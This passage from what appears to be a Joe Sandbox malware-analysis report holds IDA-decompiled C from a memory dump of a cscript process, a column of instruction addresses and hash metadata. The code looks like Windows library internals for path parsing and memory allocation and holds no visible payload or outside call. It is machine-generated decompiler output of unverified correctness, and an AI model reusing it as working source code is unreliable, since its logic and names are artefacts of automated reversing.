													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E054FF3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E054FF3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E054FF3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E054FFA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E054FFA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E054FF3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E054FF3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E05584CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E0550D130(_t427, _t494, _t511);
				}
			}

0x05585ba5
0x05585baa
0x05585baf
0x05585bb4
0x05585bb6
0x05585bbc
0x05585bbe
0x05585bc4
0x05585bcd
0x05585bd3
0x05585bd6
0x05585bdc
0x05585be0
0x05585be3
0x05585beb
0x05585bf2
0x05585bf8
0x05585bfe
0x05585c04
0x05585c0e
0x05585c18
0x05585c1f
0x05585c25
0x05585c2a
0x05585c2c
0x05585c32
0x05585c3a
0x05585c3f
0x05585c42
0x05585c48
0x05585c5b
0x05585c5b
0x05585c2c
0x05585cb7
0x05585cb9
0x05585cbf
0x05585cc2
0x05585cca
0x05585ccb
0x05585ccb
0x05585cd1
0x05585cd7
0x05585cda
0x05585ce1
0x05585ce4
0x05585ce7
0x05585ced
0x05585cf3
0x05585cf9
0x05585cff
0x05585d08
0x05585d0a
0x05585d0e
0x05585d10
0x00000000
0x00000000
0x05585d16
0x05585d1a
0x00000000
0x00000000
0x05585d20
0x05585d22
0x05585d25
0x05585d2f
0x05585d2f
0x05585d33
0x05585d3d
0x05585d49
0x05585d4b
0x00000000
0x00000000
0x05585d5a
0x05585d5d
0x05585d60
0x00000000
0x00000000
0x05585d66
0x05585d69
0x00000000
0x00000000
0x05585d6f
0x05585d6f
0x05585d73
0x05585d79
0x05585d7f
0x05585d86
0x05585d95
0x05585d98
0x05585dba
0x05585dcb
0x05585dce
0x05585dd3
0x05585dd6
0x05585dd8
0x05585de6
0x05585dec
0x05585dee
0x05585df1
0x05585df3
0x0558635a
0x0558635a
0x00000000
0x0558635a
0x05585dfe
0x05585e02
0x05585e05
0x05585e07
0x05585e10
0x05585e13
0x05585e1b
0x05585e1c
0x05585e21
0x05585e22
0x05585e23
0x05585e25
0x05585e2a
0x05585e2c
0x05585e2e
0x05585e36
0x05585e39
0x05585e42
0x05585e47
0x05585e4d
0x05585e54
0x05585e54
0x05585e54
0x05585e2e
0x05585e5c
0x05585e5f
0x05585e62
0x05585e64
0x05585e6b
0x05585e70
0x05585e7a
0x05585e7a
0x05585e7a
0x05585e6b
0x05585e7e
0x05585e7f
0x05585e7f
0x05585e81
0x05585e87
0x05585e8b
0x05585e8c
0x05585e8c
0x05585e8c
0x05585e9a
0x05585e9c
0x05585ea2
0x05585ea6
0x05585f50
0x05585f50
0x05585f57
0x05585f66
0x05585f66
0x05585f66
0x05585f68
0x05585f6a
0x055863d0
0x00000000
0x05585f70
0x05585f70
0x05585f91
0x05585f9c
0x05585f9e
0x05585fa4
0x05585fa6
0x0558638c
0x05586392
0x055863a1
0x055863a7
0x055863af
0x055863af
0x055863bd
0x055863d8
0x00000000
0x055863d8
0x05585fac
0x05585fb2
0x05585fb4
0x05585fbd
0x05585fc6
0x05585fce
0x05585fd4
0x05585fdc
0x05585fec
0x05585fed
0x05585fee
0x05585fef
0x05585ff9
0x05585ffa
0x05585ffb
0x05585ffc
0x05586000
0x05586004
0x05586012
0x05586012
0x05586018
0x05586019
0x0558601a
0x0558601b
0x0558601c
0x05586020
0x05586059
0x0558605c
0x05586061
0x05586061
0x05586022
0x05586022
0x05586022
0x05586025
0x0558602a
0x0558602b
0x05586031
0x05586037
0x05586038
0x0558603e
0x05586048
0x05586049
0x0558604a
0x0558604b
0x0558604c
0x0558604d
0x05586053
0x05586054
0x05586054
0x05586062
0x05586065
0x05586067
0x0558606a
0x05586070
0x05586075
0x05586076
0x05586081
0x05586087
0x05586095
0x05586099
0x0558609e
0x055860a4
0x055860ae
0x055860b0
0x055860b3
0x055860b6
0x055860b8
0x055860ba
0x055860ba
0x055860ba
0x055860ba
0x055860be
0x055860c0
0x055860c5
0x055860c5
0x055860c5
0x055860c6
0x055860cd
0x05586114
0x055860cf
0x055860cf
0x055860d4
0x055860d5
0x055860da
0x055860db
0x055860e1
0x055860e2
0x055860e8
0x055860f8
0x055860fd
0x055860fe
0x05586102
0x05586104
0x05586107
0x05586109
0x0558610b
0x0558610b
0x0558610b
0x0558610b
0x0558610f
0x0558610f
0x05586117
0x0558611a
0x0558611f
0x05586125
0x05586134
0x05586139
0x0558613f
0x05586146
0x05586148
0x0558614b
0x0558614d
0x0558614f
0x0558614f
0x0558614f
0x0558614f
0x05586153
0x05586159
0x05586159
0x0558615c
0x05586163
0x05586169
0x0558616c
0x05586172
0x05586181
0x05586186
0x05586187
0x0558618b
0x05586191
0x05586195
0x055861a3
0x055861bb
0x055861c0
0x055861c3
0x055861cc
0x055861d0
0x055861dc
0x055861de
0x055861e1
0x055861e4
0x055861e6
0x055861e8
0x055861e8
0x055861e8
0x055861e8
0x055861e6
0x055861ec
0x055861f3
0x05586203
0x05586209
0x0558620a
0x05586216
0x0558621d
0x05586227
0x05586241
0x05586246
0x0558624c
0x05586257
0x05586259
0x0558625c
0x0558625e
0x05586260
0x05586260
0x05586260
0x05586260
0x0558625e
0x05586264
0x05586267
0x05586269
0x05586315
0x05586315
0x0558631b
0x0558631e
0x05586324
0x05586327
0x0558632f
0x05586330
0x05586333
0x0558633a
0x0558633c
0x05586335
0x05586335
0x05586335
0x0558633f
0x05586342
0x0558634c
0x05586352
0x05586355
0x05586355
0x05586359
0x00000000
0x0558626f
0x05586275
0x05586275
0x05586278
0x0558627e
0x0558627e
0x05586281
0x05586287
0x0558628d
0x05586298
0x0558629c
0x055862a2
0x0558629e
0x0558629e
0x0558629e
0x055862a7
0x055862a7
0x055862aa
0x055862b0
0x055862f0
0x055862f0
0x055862f2
0x055862f8
0x055862fd
0x055862b2
0x055862b2
0x055862b2
0x055862b5
0x055862dd
0x055862e2
0x055862e5
0x055862b7
0x055862b8
0x055862bb
0x055862bd
0x055862c0
0x055862c4
0x055862cd
0x055862cd
0x055862c0
0x055862bb
0x055862b5
0x05586302
0x05586303
0x05586305
0x05586305
0x05586305
0x0558630c
0x0558630c
0x00000000
0x0558627e
0x05586269
0x05585eac
0x05585ebb
0x05585ebe
0x05585ecb
0x05585ecb
0x05585ece
0x05585ece
0x05585ed4
0x05585ed7
0x05585ed9
0x05585edb
0x05585edb
0x05585ee1
0x05585ee1
0x05585ee3
0x05585f20
0x05585f20
0x05585ee5
0x05585ee5
0x05585ee5
0x05585ee8
0x05585f11
0x05585f18
0x05585eea
0x05585eea
0x05585eed
0x05585ef2
0x05585ef8
0x05585efb
0x05585f0a
0x05585f0a
0x05585eed
0x05585ee8
0x05585f22
0x05585f28
0x00000000
0x00000000
0x05585f30
0x05585f31
0x05585f37
0x05585f3a
0x05585f3d
0x05585f44
0x00000000
0x00000000
0x00000000
0x05585f46
0x05585f48
0x05585f4d
0x00000000
0x05585f4d
0x05585dda
0x05585ddf
0x00000000
0x05585ddf
0x05585dd8
0x05585da7
0x05585da9
0x05585dac
0x05585dae
0x00000000
0x05585db4
0x05585db4
0x00000000
0x05585db4
0x05585dae
0x05585d88
0x05585d8d
0x05586363
0x05586369
0x0558636a
0x05586370
0x05586372
0x0558637a
0x0558637b
0x0558637d
0x00000000
0x00000000
0x0558637f
0x05586385
0x00000000
0x05586385
0x05585d38
0x05585d3b
0x00000000
0x00000000
0x00000000
0x05585d3b
0x05585d27
0x05585d29
0x00000000
0x00000000
0x00000000
0x05586360
0x00000000
0x05586360
0x05585c10
0x05585c10
0x055863da
0x055863e5
0x055863e5

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 955445bcd0fee46be48b0dae492bc5eb016393d394c9ee74982b43b5bd15fab3
Instruction ID: 65b0eb086039366917d382f543ef48fa9551c12123aecae264fe835ed8b48015
Opcode Fuzzy Hash: 955445bcd0fee46be48b0dae492bc5eb016393d394c9ee74982b43b5bd15fab3
Instruction Fuzzy Hash: 1A425B75E04229DFDB24DF68C880BA9B7B1FF45304F1481AAD94DEB242E734A985CF50

Uniqueness

Uniqueness Score: -1.00%

Function 054D4120, Relevance: .4, Instructions: 444
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E054D4120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x55ad360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E054EF232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E054D6E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L054D4620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E054D6E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M054D45F8))) {
												case 0:
													_v568 = 0x5491078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x54911c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L054D4620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E054FF720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E054FF720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E054B52A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E054CEB70(1, 0x55a79a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E054CAA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E054F95D0();
																			L054D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L054D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E054FB640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E054F3D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
